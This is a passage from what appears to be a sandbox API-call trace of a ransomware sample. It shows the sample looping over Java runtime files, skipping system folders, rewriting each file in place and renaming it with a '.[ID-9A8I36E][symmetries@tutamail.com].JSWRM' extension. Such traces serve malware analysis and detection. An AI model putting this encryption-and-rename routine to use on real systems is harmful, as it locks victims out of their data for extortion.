and settings") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="system volume information") returned -1 [0070.193] lstrcmpiW (lpString1="sunec.jar", lpString2="msocache") returned 1 [0070.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0070.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.jar", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunec.jar", lpUsedDefaultChar=0x0) returned 9 [0070.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0070.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0070.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunec.jar", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunec.jar", lpUsedDefaultChar=0x0) returned 9 [0070.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0070.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0070.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.193] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.199] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42185) returned 1 [0070.199] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa4c0) returned 0x24e1e0 [0070.200] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xa4c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xa4c0, lpOverlapped=0x0) returned 1 [0070.204] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.204] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xa4c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xa4c0, lpOverlapped=0x0) returned 1 [0070.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.204] CloseHandle (hObject=0x458) returned 1 [0070.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0070.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0070.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0070.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0070.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunec.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunec.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0070.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.205] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x44661, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sunjce_provider.jar", cAlternateFileName="SUNJCE~1.JAR")) returned 1 [0070.205] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2=".") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="..") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="...") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="windows") returned -1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="recovery") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="perflogs") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="documents and settings") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="system volume information") returned -1 [0070.206] lstrcmpiW (lpString1="sunjce_provider.jar", lpString2="msocache") returned 1 [0070.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunjce_provider.jar", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0070.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0070.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunjce_provider.jar", cchWideChar=19, lpMultiByteStr=0x241060, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunjce_provider.jar", lpUsedDefaultChar=0x0) returned 19 [0070.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunjce_provider.jar", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0070.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0070.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunjce_provider.jar", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunjce_provider.jar", lpUsedDefaultChar=0x0) returned 19 [0070.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0070.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0070.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0070.206] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.207] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=280161) returned 1 [0070.207] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.207] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.337] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.337] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.338] CloseHandle (hObject=0x458) returned 1 [0070.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0070.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0070.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.339] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunjce_provider.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0070.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0070.339] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7fbb, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sunmscapi.jar", cAlternateFileName="SUNMSC~1.JAR")) returned 1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2=".") returned 1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="..") returned 1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="...") returned 1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="windows") returned -1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="recovery") returned 1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="perflogs") returned 1 [0070.339] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="documents and settings") returned 1 [0070.340] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.340] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="system volume information") returned -1 [0070.340] lstrcmpiW (lpString1="sunmscapi.jar", lpString2="msocache") returned 1 [0070.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0070.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.jar", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunmscapi.jar", lpUsedDefaultChar=0x0) returned 13 [0070.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0070.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0070.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunmscapi.jar", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunmscapi.jar", lpUsedDefaultChar=0x0) returned 13 [0070.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0070.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0070.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0070.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0070.340] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.341] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32699) returned 1 [0070.341] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7fb0) returned 0x24e1e0 [0070.341] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x7fb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x7fb0, lpOverlapped=0x0) returned 1 [0070.345] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.345] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x7fb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x7fb0, lpOverlapped=0x0) returned 1 [0070.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.345] CloseHandle (hObject=0x458) returned 1 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0070.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0070.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0070.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0070.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0070.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0070.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.346] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3d5bf, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sunpkcs11.jar", cAlternateFileName="SUNPKC~1.JAR")) returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2=".") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="..") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="...") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="windows") returned -1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="recovery") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="perflogs") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="documents and settings") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="system volume information") returned -1 [0070.346] lstrcmpiW (lpString1="sunpkcs11.jar", lpString2="msocache") returned 1 [0070.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0070.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunpkcs11.jar", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sunpkcs11.jar", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sunpkcs11.jar", lpUsedDefaultChar=0x0) returned 13 [0070.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0070.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.346] WideCharToMultiByte (in: 